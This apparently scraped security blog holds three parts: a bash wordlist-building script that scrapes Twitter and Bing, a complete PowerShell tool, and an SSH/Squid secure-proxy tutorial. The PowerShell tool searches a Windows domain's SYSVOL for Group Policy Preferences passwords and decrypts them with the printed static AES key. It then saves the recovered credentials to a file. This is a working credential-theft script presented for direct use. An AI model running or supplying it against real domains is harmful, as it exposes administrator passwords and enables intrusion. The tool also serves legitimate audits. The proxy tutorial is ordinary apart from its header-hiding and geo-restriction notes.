# getTweets() is based on twitter.sh by:        #
#      Joshua Dustin                            #
#7habitsofhighlyeffectivehackers.blogspot.com.au#
#################################################

#import arguments
args="$@"

#clear screen and check for input parameter
clear
if [ -z "$1" ]
then
    echo "Missing input parameters.  Please use $0  "
    kill -int $$
else
  echo ""
fi

# scrape Twitter for tweets containing your keywords
getTweets() {
	local key=$1
	echo -n "Grabing for keyword $key..."
	wget -q "http://search.twitter.com/search.json?q=$key&rpp=500" -O result.json
	cat result.json | tr "," \\n | grep "^\"text" | cut -d"\"" -f4- | tr " " \\n | sed -e 's~&~~' | sed -e 's~>~~' | sed -e 's~<~~' | sed s/[\"=\|?.\!\(\):\;]//g | sed s/\^\#//g | sed s/\^\@//g | sed '/^$/d' | grep -v "^http:" | grep -v "\\\\" >> wl.temp
	rm -f result.json
	echo " complete."
	sleep .1
}

# scrape Bing for search results related to your keywords
getBing() {
	local key=$1
	echo -n "Grabing for keyword $key..."
	wget -q "http://api.search.live.com/rss.aspx?source=web&query=$key" -O result.rss
	cat result.rss | sed -e 's~&~~' | sed -e 's~>~~' | sed -e 's~<~~' | sed -e :a -e 's/<[^<]*>/ /g;/> wl.temp
	rm -f result.rss
	echo " complete."
	sleep .1
}

# loop through keywords calling the twitter scrape function
echo "Starting Twitter grabs..."
for word in $args
	do
	getTweets $word
	done
echo ""

# loop through keywords calling the bing scrape function
echo "Starting Bing grabs..."
for word in $args
	do
	getBing $word
	done
echo ""

# sort/unique/clean up results
echo "Sorting wordlist..."
cat wl.temp | sort -u >> wordlist.list
sort -u wordlist.list | uniq -u | sort -o wordlist.list
sed -i '/^$/d' wordlist.list
rm -f wl.temp
echo ""

# this while block allows us to re-scrape using the keywords found in the original grabs.
while [ -z $quit ]
	do
	listLength=`wc -l wordlist.list | awk '{print $1}'`
	echo "Wordlist contains $listLength words so far.  We can re-scan"
	echo "using the words in this list to find even more or we can quit."
	echo ""
	echo "Type q to exit or press [ENTER] to re-scan"
	read -n1 quit
	if [ $quit ]
	then 
		echo ""
		echo ""
		break
	else
		# loop through current results calling the twitter scrape function
		echo "Starting twitter grabs..."

		cat wordlist.list | while read word;
			do
			getTweets $word
			done
		echo ""

		# loop through current results calling the bing scrape function
		echo "Starting Bing grabs..."
		cat wordlist.list | while read word;
			do
			getBing $word
			done
		echo ""

		# sort/unique/clean up results once more
		echo "Sorting wordlist..."
		cat wl.temp | sort -u >> wordlist.list
		sort -u wordlist.list | uniq -u | sort -o wordlist.list
		rm -f wl.temp
		echo ""
	fi
	done

rm -f result.json 2> /dev/null
rm -f result.rss 2> /dev/null
listLength=`wc -l wordlist.list | awk '{print $1}'`
echo "Worlist complete:  $listLength words."

More Information:

PShell Script: Extract All GPO Set Passwords From Domain

This script parses the domain’s Policies folder looking for Group.xml files.  These files contain either a username change, password setting, or both.  This gives you the raw data for local accounts and/or passwords enforced using Group Policy Preferences.  Microsoft chose to use a static AES key for encrypting this password.  How awesome is that!

The password is encrypted once with AES  in CBC mode at 256 bits.  The key used is:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

A big thank you to my friend Keith B who helped me with tips for the PowerShell code.  I definitely do not have a background working with PS and learned some cool things along the way.

This script was modified from original work by Chris Campbell as noted in the comments.

Update:  21 Oct 2012:  With feedback from Piet Carpentier (@DFTER) and ‘Joe’ I’ve modified the decryptPassword function to correct an issue where the string was sometimes too long or not returned which was returning as a failed decryption rather than a missing string or incorrectly decoded string.  Thanks guys!

Update:  14 Dec 2012:  Reviewed this and found a couple things I could fix or improve on.  The functions return better information and I fixed a bug that caused decryption failures in some cases.

Running this script:

  • Run it against the current domain to find everything:
    • PS C:\> .\GPO-Passwords.ps1
  • Run it against a local copy of a Groups.xml file:
    • PS C:\> .\GPO-Passwords.ps1 -local .\Groups.xml
<#
#################################################
# Group Policy Preferences Password check by:   #
# Nathan V                                      #
# Cyber Security Analyst                        #
# http://nathanv.com                            #
#                                               #
# For assistance and new versions contact       #
# nathan.v@gmail.com                            #
# This file updated: 14 Dec 2012                #
#################################################
# This script (c)2012 Nathan V : License: GPLv2 #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################
# Based on Get-GPPPassword by:                  #
# Chris Campbell                                #
# www.obscuresecurity.blogspot.com              #
# @obscuresec                                   #
#################################################
#>
Param(
    [alias("local")]
    $localfile)

# Import the Group Policy module;  required for finding the GPO name for each password.  If this fails the names will not resolve but other functions will still work.
import-module grouppolicy -ea SilentlyContinue
$results = @()  # declare dynamic results array

# Function to allow us to go to the network DIR and then return back to where we started
function cdir {
    if ($args[0] -eq '-') {
            $pwd=$OLDPWD;
        } else {
            $pwd=$args[0];
        }
        $tmp=pwd;
        if ($pwd) {
            Set-Location $pwd;
        }
    Set-Variable -Name OLDPWD -Value $tmp -Scope global;
}

#Function to pull encrypted password string from groups.xml
function parsecPassword {
    try {
        [xml] $Xml = Get-Content ($Path)
        [string] $cPassword = $Xml.Groups.User.Properties.cpassword
    } catch { $cPassword = "No Password Policy Found" }
    return $cPassword
}
#Function to look to see if the administrator account is given a newname
function parseNewName {
    try {
    [xml] $Xml = Get-Content ($Path)
    [string] $newName = $Xml.Groups.User.Properties.newName
    if ($newName) {
      return $newName
    } else {
      return "No Username Specified"
    }
    } catch { $newName = "Error" }
}
#Function to parse out the Username whose password is being specified
function parseUserName {
    try {
        [xml] $Xml = Get-Content ($Path)
        [string] $userName = $Xml.Groups.User.Properties.userName
    if ($userName) {
      return $userName
    } else {
      return "No Username Specified"
    }
    } catch { $userName = "Error" }
}

#Function that decodes and decrypts password
function decryptPassword {
    try {
    if( $cPassword.Length -eq 0 ) {
      return "Empty Password!"
    } elseif( $cPassword.Length -gt 64 ) {
      [string]$cPassword = [string]$cPassword.Substring(0,64)
    } else {`
      [string]$Pad = "=" * (4 - ($cPassword.length % 4))
    }
        $b64Decoded = [Convert]::FromBase64String($cPassword + $Pad)
        $aesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $aesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
        $aesIV = New-Object Byte[]($aesObject.IV.Length)
        $aesObject.IV = $aesIV
        $aesObject.Key = $aesKey
        $decryptorObject = $aesObject.CreateDecryptor()
        [Byte[]] $outBlock = $decryptorObject.TransformFinalBlock($b64Decoded, 0, $b64Decoded.length)
        return [System.Text.UnicodeEncoding]::Unicode.GetString($outBlock)
    } catch { return "Decryption Failed!" }
}

# Function to find the policy name to locate where the password is valid
function getGPO {
    $guid = $Path.Substring(1,36)
    try {
        $gpoName = get-gpo -guid $guid | Select-Object -ExpandProperty DisplayName
    } catch {
        $gpoName = "Unable to find GPO name"
    }
    return $gpoName
}

# Function to parse the XML, decrypt the key, and return the results.
function parseDecrypt($path) {
    $cPassword = parsecPassword
    $password = decryptPassword
    $newName = parseNewName
    $userName = parseUserName
    if ($localfile -eq $null) {$gpo = getGPO} else {$gpo = "Local file"}
    $results = "$username, $newName, $password, $gpo"
    return $results
}
Clear-Host
if ($localfile -eq $null) {
    Write-Host "Searching $Env:UserDNSDomain for Group Policy Preferences passwords."
    Write-Host "On a large domain this may take some time. Please wait..."
    $sourceXML = Get-ChildItem -Path "\\$Env:UserDNSDomain\SYSVOL\$Env:UserDNSDomain\Policies" -recurse -name -include Groups.xml
    cdir \\$Env:UserDNSDomain\SYSVOL\$Env:UserDNSDomain\Policies\  # Due to the potential length of the filenames given a long domain name we CD to the Policies folder to shrink it down
    } else {
    Write-Host "-local used; checking file $file"
    $sourceXML = $localfile
    }

Write-Host " "
Write-Host "Username, New name (if any), Password, source GPO:"
Write-Host " "

foreach($file in $sourceXML) { 
    $results += parseDecrypt $file
    }
if ($localfile -eq $null) {cdir -}
"Username, New name (if any), Password, source GPO:" > ".\domain_passwords.txt"
foreach($result in $results) {
    Write-Host $result
    $result >> ".\domain_passwords.txt"
    }
Write-Host " "
Write-Host "List of discovered setttings saved as .\domain_passwords.txt"

More Information:

Secure Browsing From Anywhere

Do you trust the wifi you’re using at Starbucks?  Maybe that hardline at the hotel is sketchy.  You never know who is on the network with you and what their skills and motivations might be.  Why share anything with them if you don’t have to?  What the sections below cover is setting up a secure proxy server that you have control of to allow you to surf the internet on even the most questionable connections without having to worry about eavesdroppers and MITM attacks.  We’ll set up a linux server, SSH with certificate authentication, and then start browsing through an encrypted tunnel.  Your SSHD options may dictate another setting but typically this tunnel will be secured with AES-256 which is a secure and fast cypher.  AES-256 is what’s used with other encrypted storage or communications like BitLocker, IronKey devices, and SSL.

This does assume that you have some technical background already but I tried to make things pretty easy.  If there are any questions please add them in the comments and I can try to answer there or add them into the post.

The first section below covers the setup and initial configuration of the proxy server.  In this example we’re using a linux server and the Squid proxy.  Linux natively supports SSH for the encrypted tunnel and Squid is an excellent open-source proxy solution that also provides web caching.  You can set up a similar solution using SSH via a Windows server but it requires a more involved setup process as SSH isn’t natively a part of the Windows OS.

The second section describes the client setup and use from either linux or Windows.  The linux instructions should work for Mac users as well.  Once the proxy is up and online using it from your client system is easy and straightforward.

The third section is optional as it’s additional configuration that doesn’t have a major technical effect as we’ve already encrypted everything but what it does to is prevent the sites your visiting from knowing you’re even using a proxy.  The possible implications of that would be altered behavior of the site due to your IP being identified as from another nation or similar.  For example, some sites limit your access based on your location because of copyright reasons. While this is not meant to be an assist to violating copyrights that ability is there.  The goal for me in this was being able to get US internet while abroad.  I can’t watch Netflix movies from Europe on my US Netflix account but it works well when I pass my traffic via my transparent US proxy server.

In the last section I’ll address an additional configuration option for Firefox that will also prevent information leakage via your DNS requests.  What the setting does is tell Firefox to forward DNS requests to the proxy server to answer rather than querying the DNS server your client system is pointed to.  This means that if an attacker is listening on the wire they are unable to see what sites you’re browsing based on your DNS queries.

If you don’t have a handy dandy home linux server like I do then you’ll want to get one set up or use a cloud provider.  Amazon Web Services provides an intro tier that gives you enough free utilization to run a small linux server for a year and a fair amount of bandwidth along with several other services.  You can sign up for this at https://aws.amazon.com/free  Just keep an eye on your bandwidth usage and you can use it 100% free.  It’s cheap after you get out of the free tier but keep in mind it does cost money if you use more than the allotted free amount.  Beyond that there are other options (all paid) by using Linode, Rackspace, or others.  There’s no option for a linux server with Azure (yet?) so don’t try there unless you want to try to set this up on Windows.

 

Note:  These instructions assume that they are run as an administrative user such as root.  If you will be using a non-administrative user with sudo rights just keep in mind most of these commands require sudo first.  Also, note that the instructions below are based on completing this on Ubuntu, Arch, or Fedora.  The packages specific to your system may vary slightly if you’re using another distribution.  You can check the online references or package lists to verify which package is right for you.

 

Part 1: Server Setup (Linux)

1. Make sure your server’s firewall is secure. You’re going to be installing a proxy server and you don’t want the world trying to use it. How you choose to do this is up to you but IPTables is a solid option.  Make sure, however, that you are careful with the rules or your own connections will be blocked as well.  If there’s interest I’ll add an IPTables how-to onto here as well.  If you are using an AWS VM the default setting is very secure as it doesn’t allow anything through you haven’t already specified.  If you haven’t done so already make sure the server is up to date as well.  Example: apt-get upgrade or yum update or pacman -Syu

2. Install SSH if not already present. Example: apt-get install openssh-server or yum install openssh-server or pacman -S openssh

3. Set up SSHD. You can find the config usually in /etc/ssh/sshd_config.  Example:  nano /etc/ssh/sshd_config
— a. Set port to something high and/or unusual like 45454
— b. Disable password authentication.
— c. Disable remote root login
— d. Enable logging to SYSLOG for all AUTH if not already enabled
— e. Ensure RSA logins are enabled and using .ssh/authorized_keys or another to your preference.  Here I will assume .ssh/authorized_keys

4. Create a new user on the system. I recommend using -m to create the home directory in advance.  If you’d like to be able to use this account for administrative functions you can also use -G to specify the group the user should belong to.  For Ubuntu you would use the second example provided.  Example:  useradd -m newuser  Example 2:  useradd -Gm newuser,wheel

5. Use ssh-keygen to generate an ssh key for this user. I recommend using -b 4096 -t rsa to use a 4096bit RSA certificate.  Example:  ssh-keygen -b 4096 -t rsa

6. Copy the public key into the users authorized key file. Create the file and folder if needed. Example: cat newuserkey.pub > /home/newuser/.ssh/authorized_keys

7. Use chmod to change the permissions of the file to 0600 so it is recognized by SSHD.  Example: chmod 0600 /home/newuser/.ssh/authorized_keys

8. Copy the private key to the system you’ll be connecting from.  Make sure you name it something obvious so you’ll be able to find it again.  Example:  newuserkey.pem

9. Start/restart SSHD. If SSHD is running use /etc/rc.d/sshd restart or /etc/init.d/sshd start or service sshd restart. Which works will depend on your distro.  If not running use start instead of restart.

10. From the other system use PuTTy or SSH to test the connection and make sure it works and the key works. If you’re not familiar with this process use the instructions in Part 2.  Example: ssh -i newuser.pem newuser@server -p 45454

11. Once SSHD is verified go back to the server and install Squid. Example: yum install squid or apt-get install squid or pacman -S squid

12. The Squid default config will be fine for our purposes but you can harden it by editing /etc/squid/squid.conf or wherever you installed to.

13. Start Squid. Example: /etc/rc.d/squid start or /etc/init.d/squid start or service squid start

14. Use chkconfig to verify the services for Squid and SSH start automatically.  Run  chkconfig   to see the current setting.
•  a. If one of both of the services aren’t set to on at any run level you can fix that also using chkconfig.
•  b. To start Squid automatically use the first example.  The second is for SSHD.  Example:  chkconfig –level 2345 squid on Example 2:  chkconfig –level 2345 sshd on

16. Validate that the firewall between this system and the internet allows incoming connections on the port you chose.

 

Part 2: Using your new RSA encrypted secure proxy

Part 2a: Linux Client system

1. From a remote site verify you have internet connectivity.

2. Verify that SSH back to your server is working. Example: ssh -i newuserkey.pem newuser@server -p 45454

3. Disconnect and reconnect with tunneling enabled targeting the Squid port. Example: ssh -i newuserkey.pem -L 8080:localhost:3128 newuser@server -p 45454

4. Open your browser and change the proxy setting to 127.0.0.1:8080.  In Firefox this is in Options -> Advanced -> Network -> Settings

5. Attempt to open a web site. You should be able to browse like normal.

6. Congrats! You are now browsing inside an encrypted tunnel!

Part 2b: Windows Client Cygwin Method

1. From a remote site verify you have internet connectivity.

2. Install Cygwin from  http://www.cygwin.com/install.html

3. Open the Cygwin terminal and verify that SSH back to your server is working. Example:  ssh -i newuserkey.pem newuser@server -p 45454

4. If that succeeds disconnect (just type exit) and reconnect with tunneling enabled targeting the Squid port.  Example:  ssh -i newuserkey.pem -L 8080:localhost:3128newuser@server -p 45454

5. Open your browser and change the proxy setting to 127.0.0.1:8080 for all protocols.  In Firefox this is in Options -> Advanced -> Network -> Settings

6. Attempt to open a web site. You should be able to browse like normal.

7. Congrats! You are now browsing inside an encrypted tunnel!

Part 2c: Windows Client PuTTy Method

1. From a remote site verify you have internet connectivity.

2. Install Putty using the Windows installer from http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

3. Open up PuTTyGen and import your newuserkey.pem certificate file.

4. Save the new PuTTy formatted key by clicking Save Private Key. You can ignore the prompt about not passwording the file.  It will now have a PPK extension and look like newuserkey.ppk

5. Open the main PuTTy program and type or paste in the server’s DNS name or IP and correct the port number to the one you set SSHD to.

6. In the left-side menu select SSH and then Auth to get to the SSH Authorization section.  Click browse next to Private Key File For Authentication and select your newuserkey.ppk file.

7. At the bottom of the window type in a name for the config and click Save and then Connect to test the connection.

8. If that succeeds disconnect (just type exit) and reopen PuTTy.

9. Once PuTTy is open select your saved config and click on Load.

10. Now that your config is loaded use the left-side menu to select SSH and then tunnels

11. Type in 8080 in the source port and for destination use 127.0.0.1:3128 and click Add.

12. Click on Session at the top of the menu and click Save to save your updated config.

13. Click on connect to start a new SSH connection to the server.

14. Open your browser and change the proxy setting to 127.0.0.1:8080 for all protocols.  In Firefox this is in Options -> Advanced -> Network -> Settings

15. Attempt to open a web site. You should be able to browse like normal.

16. Congrats! You are now browsing inside an encrypted tunnel!

 

Part 3:  Hide the proxy flags (optional)

1. Open your Squid config file for editing (Example: nano /etc/squid/squid.conf) and add the following lines to the bottom:

Squid 2.x:

via off
follow_x_forwarded_for deny all
forwarded_for delete
request_header_access From deny all
request_header_access Server deny all
request_header_access WWW-Authenticate deny all
request_header_access Link deny all

Squid 3.x:

via off
forwarded_for delete
request_header_access X-Forwarded-For deny all
request_header_access From deny all
request_header_access Server deny all
request_header_access WWW-Authenticate deny all
request_header_access Link deny all

 

Part 4:  Extra Firefox Settings (all clients)

1. Open up Firefox and in the URL bar type in about:config

2. Find the setting network.proxy.socks_remote_dns and change the value to true

 

More Information: